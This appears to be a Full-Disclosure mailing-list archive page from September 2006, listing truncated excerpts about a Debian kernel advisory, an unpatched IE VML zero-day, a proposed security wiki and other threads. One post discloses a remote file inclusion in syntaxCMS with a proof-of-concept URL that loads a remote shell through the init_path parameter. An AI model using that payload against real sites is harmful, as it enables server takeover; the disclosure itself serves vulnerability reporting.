[Full-disclosure] [SECURITY] [DSA 1183-1] New Linux 2.4.27 packages fix several vulnerabilities

2006-09-24 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1183-1 [EMAIL PROTECTED] http://www.debian.org/security/ Dann Frazier September 25th, 2006

Re: [Full-disclosure] The truth about Rob Levin aka Lilo of irc.freenode.net

2006-09-24 Thread Tonnerre Lombard
Salut, On Fri, 2006-09-22 at 20:51 +0200, Diman Todorov wrote: > > [20:48] -LoRez- [Global Notice] Hi all. Some of you may not have > heard the news that Rob Levin, known to most as Freenode's head of > staff lilo, passed away on the 16th following a car accident on the > 12th. Condol

Re: [Full-disclosure] WikiSecu.com - What you think about that?

2006-09-24 Thread fun frok
Please have a look at this site. http://www.securityforest.com/wiki/index.php/Main_Page On 9/22/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: > WikiSecu.com: > > The idea is to build a knowledge base related to computer security, which > would be democratic and driven by the community. The we

Re: [Full-disclosure] Yet another 0day for IE (Disabling Javascript no longer a fix)

2006-09-24 Thread Nick FitzGerald
Bill Stout wrote: > http://sunbeltblog.blogspot.com/2006/09/seen-in-wild-zero-day-exploit-be > ing.html > "This exploit can be mitigated by turning off Javascripting. > > Update: Turning off Javascripting is no longer a valid mitigation. ... Well, to pick a nit, the Sunbelt blog entry is corr

Re: [Full-disclosure] WikiSecu.com - What you think about that?

2006-09-24 Thread Adriel Desautels
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I'd be very interested. [EMAIL PROTECTED] wrote: > WikiSecu.com: > > The idea is to build a knowledge base related to computer security, which > would be democratic and driven by the community. The website would be > similar to wikipedia.org > > L

Re: [Full-disclosure] Windows Automatic Gringo ZaW!

2006-09-24 Thread Dave "No, not that one" Korn
? wrote: >> So, WTF#1 is: what the hell makes them think my utterly clean >> machine could possibly be infected? What kind of pseudo "detection" >> technique are they using? So WTF#2 is: why the hell are they trying >> to push obsolete old garbage on me? >> I'm going to leave my workstation unp

[Full-disclosure] Remote File Include in syntaxCMS

2006-09-24 Thread MoHaJaLi
Remote File Include in syntaxCMS Vulnerable File: 0004_init_urls.php Vulnerable Code: 1 PoC: http://www.poweredbysyntaxcmssite.com/admin/testing/tests/0004_init_urls.php?init_path=http://YourShell?&; Solution: Remove This File...it's not needed...just used for tests Found by M

[Full-disclosure] Windows VML Vulnerability FAQ (CVE-2006-4868) written

2006-09-24 Thread Juha-Matti Laurio
I have posted a Frequently Asked Questions document about the unpatched Windows VML vulnerability. The document, entitled Windows VML Vulnerability FAQ (CVE-2006-4868), is located at my SecuriTeam Blogs section, http://blogs.securiteam.com/?p=640 The document describes related malware, 3rd party

[Full-disclosure] ZERT patch [was: 0day for IE (Disabling Javascript no longer a fix)]

2006-09-24 Thread Gadi Evron
On Sun, 24 Sep 2006, Bill Stout wrote: > http://sunbeltblog.blogspot.com/2006/09/seen-in-wild-zero-day-exploit-be > ing.html > "This exploit can be mitigated by turning off Javascripting. > > Update: Turning off Javascripting is no longer a valid mitigation. A > valid mitigation is unregistering

Re: [Full-disclosure] Yet another 0day for IE (Disabling Javascript no longer a fix)

2006-09-24 Thread Bill Stout
http://sunbeltblog.blogspot.com/2006/09/seen-in-wild-zero-day-exploit-being.html "This exploit can be mitigated by turning off Javascripting. Update: Turning off Javascripting is no longer a valid mitigation. A valid mitigation is unregistering the VML dll. " Bill Stout -Original Message-

Re: [Full-disclosure] Linux kernel source archive vulnerable

2006-09-24 Thread Ron
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi, Hadmut Danisch wrote: > Your assumption is false here. The kernel maintainers DO NOT say this: > Read the README file, it does not contain any statement that you do > not have to compile as root. They silently explain how to compile if > you are n

Re: [Full-disclosure] Windows Automatic Gringo ZaW!

2006-09-24 Thread Valdis . Kletnieks
On Sun, 24 Sep 2006 13:48:46 +0200, マグロ原子 said: > > So, WTF#1 is: what the hell makes them think my utterly clean machine could > > possibly be infected? What kind of pseudo "detection" technique are they > > usin > > So WTF#2 is: why the hell are they trying

Re: [Full-disclosure] Self-contained XSS Attacks (the new generation of XSS)

2006-09-24 Thread Ron Jennings
Hi Tim, You make a great point. Ron Jennings, NCIE SSP Chaser Security- A Microsoft Partner Cell:559.360.2340 24hr.customer service VOIP:562.365.1295 From: Tim <[EMAIL PROTECTED]> To: "pdp (architect)" <[EMAIL PROTECTED]> CC: full-disclosure@lists.grok.org.uk, bugtraq@se

Re: [Full-disclosure] Windows Automatic Gringo ZaW!

2006-09-24 Thread マグロ原子
> So, WTF#1 is: what the hell makes them think my utterly clean machine could > possibly be infected? What kind of pseudo "detection" technique are they > using? > So WTF#2 is: why the hell are they trying to push obsolete old garbage on me? > I'm going to leave my workstation unplugged over the

Re: [Full-disclosure] WikiSecu.com - What you think about that?

2006-09-24 Thread マグロ原子
Seeing Wikipedia's failure in creating quality content and instead succeeding in a grand waste of time for all participants and a great place for flamefests and dumping of spam, I think you should not make it a Wiki or rather put a heavy barrier before contributions are allowed. "Democratic and dr